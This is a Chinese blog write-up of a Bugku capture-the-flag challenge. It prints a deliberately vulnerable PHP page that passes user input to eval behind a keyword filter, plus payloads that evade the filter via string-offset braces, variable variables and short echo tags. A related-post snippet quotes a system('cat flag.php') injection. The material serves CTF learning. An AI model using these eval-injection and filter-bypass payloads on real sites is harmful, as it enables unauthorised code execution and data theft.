Bugku冬至红包记录Check via eval

最新推荐文章于 2022-03-11 14:57:46 发布
最新推荐文章于 2022-03-11 14:57:46 发布
阅读量448 收藏 2
点赞数
分类专栏: ctf 学习笔记 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49762339/article/details/112910839
版权

写在前面:

这道题过滤太阴间了,这我是看了大佬的题解才有的启发。

WP:

代码:

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);

首先要符合长度,这一点很简单,只要点击提示部分就会得到:
?flag=return'07b337ae4078972e8619fd3a40913ad714441b57';
我们只要在这个基础上修改就行了

接下来就是想办法绕过过滤,这个过滤太阴间了!!!
它禁止使用:
',",/,.,\,\,(,),{,},_,flag,echo,print,require,include,die,exit。

在看了大佬的payload后
payload=?flag=$a='blag';$a{0}='f';?>11111111111111111;<?=$$a;?>

我也尝试构造了一个:
payload=?flag=$payload='flab';$payload{3}='g';?><?=$$payload;?>

解锁新的过滤姿势:
1){}代替[]
2) 利用PHP是可变变量的性质
3)利用短标签

<? /*程序操作*/ ?> <?=/*函数*/?>
k_i_k_i
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
20210221CTF小记之bugkuCTF冬至红包(短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制)
qq_45290991的博客
02-22 2171
今天做了一道很恶心的题目,话不多说,先上结果图: 我们先来分析代码: 当没有用GET方法传入flag时,会显示Click here的链接。 点击链接会用GET方法传入一串字符串$exam,后面是当前时间的一串sha1哈希值。 判断传入的flag长度与$exam是否相同,不同则显示 长度不允许 第二个判断过滤了一大堆 第三个判断传入flag的值等于flag值的哈希值,正确就输出flag。用的是严格的三个等号的比较,我们flag都不知道,哈希值更不可能知道了,== 但容易发现此处存在任意代码.
Bugku 冬至红包
qq_52671379的博客
06-18 382
Bugku 冬至红包 题目 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen(
Bugku冬至红包
qq_46230755的博客
01-21 806
这题是一题代码审计 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen($_GET
BUGKU-WEB-冬至红包
qq_49422880的博客
05-31 203
冬至红包   上题目,每次都要读PHP代码,本身就没有学过,碰到不懂的函数得一个一个查,关键是题目还不能确定是不是自己想得那个意思。 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'"&
bugku web 冬至红包
m0_58189778的博客
08-19 185
题目:bugku 冬至红包 知识点:命令执行、{}的用法、<?= ?> 工具: 解题: 点开链接: 代码审计: $exam= return'20bd0ee711140119120c8e5e7d08f39ded52c7e3'; 设置?flag len(flag)==len($exam) 不匹配正则 到达此处有一个命令执行漏洞 有一个问题是eval(),如果我们使用return获取命令执行的返回值,使其与sha1($flag)相等,必然要使用到函数,但是匹配.
十六、bugku eval
山兔的博客
09-06 272
?hello=system("cat flag.php") 查看源码 ?hello=`vi flag.php` 编辑源码 用cat也可以,cat只不过必须在源码里面看,而tac显示在前端。 单引号也可以,用system()绕过。 require 一般放在 PHP 文件的最前面,程序在执行前就会先导入要引用的文件。 include 一般放在程序的流程控制中,当程序执行时碰到才会引用,简化程序的执行流程。 require 引入的文件有错误时,执行会中断,并返回一个致命错误。include 引入的文
pytorch掉坑记录:model.eval的作用说明
09-16
在PyTorch中,`model.eval()` 是一个非常关键的函数,主要用于切换模型的状态,使其进入评估模式。这个函数在训练完成后,当我们需要对模型进行验证或者测试时使用。理解`model.eval()`的作用对于避免一些常见错误至...
使用NLG-Eval需要依赖的数据包
11-01
NLG_Eval是一款用于自然语言生成(Natural Language Generation, NLG)评估的工具,它能够帮助研究人员和开发者量化地分析生成文本的质量。在使用NLG_Eval之前,我们需要确保安装了必要的依赖数据包,以便该工具能...
jetbrains-eval-reset
05-16
jetbrains-eval-reset
eval与window.eval的差别分析
10-28
JavaScript中的`eval`和`window.eval`都是用来执行动态JavaScript代码的函数,但它们在不同浏览器中的行为有所差异。理解这些差异对于编写可移植的、安全的JavaScript代码至关重要。 首先,`eval`函数是一个全局...
Solve Me解题记录
0verWatch的博客
08-14 3782
前言 前一阵子关注点在实战上,现在又回归CTF学习套路了,这个网站本来做了一半的题目,今天终于把他补完了,学到了炒鸡多的东西啊~ 正文 Warm up 给出来一个密文和一段代码 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= &amp;amp;amp;lt;?php error_reporting(0); require __D...
BugkuCTF中套路满满的题-------Welcome to the bugku
qq_42133828的博客
01-24 1806
这套题目主要涉及到的知识是php伪协议,若是不了解这个的话,这道题目基本就out了。。。 当然,不了解的小伙伴,可以到这位大佬的博客去瞅瞅https://www.freebuf.com/column/148886.html 其实总结之后,最常所用到的不过是php://input(将文件的内容读出)以及php://filter/read=convert.base64-encode/resourc...
solve me(web wp)
Xi4or0uji
09-02 1381
warm up 逆着解下码 &lt;?php $chars = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY="; echo hex2bin(strrev(bin2hex((base64_decode($chars))))); 得到结果flag{582a0f2c7e302244b110cc461f5cb100} badcom...
Bugkuctf套路满满的题--------细心
qq_42133828的博客
01-25 811
这道题目,说白了,也就是使用一下工具。。。 讲一下大概思路: 先查看源码无果  ---&gt; 御剑扫描后台一波 ---&gt; robots.txt ---&gt; 有/resusl.php文件 ---&gt; 访问/resusl.php ---&gt; 传参x=admin ---&gt; flag!! 好了,思路很清楚了,那就不截图了。。。  ...
BugKuCTF 杂项 签到题
无限迭代中......
09-02 1283
https://ctf.bugku.com/files/a45ef3c87135eabd7d472d5a60d86447/qrcode_for_gh_d10dfd684f1b_258.jpg 题解:扫码关注即可
[CTFSHOW][红包题]耗子尾汁
Y4tacker的博客
12-01 1603
文章目录前言前置知识代码审计简单分析函数说明以及预期解非预期解参考文章 前言 很开心今天拿了一个一血,也谢谢Firebasky师傅的题目了 前置知识 在php当中默认命名空间是\,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name()这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法 代码审计 简单分析 传入参数a与b,如
Bugku 闪电十六鞭
m0_63253040的博客
03-11 905
进入环境,是一串php代码 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen
CTFWeb——Bugku秋名山老司机 详细题解
日熙的博客
08-19 3244
1
bugku sodirty
最新发布
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值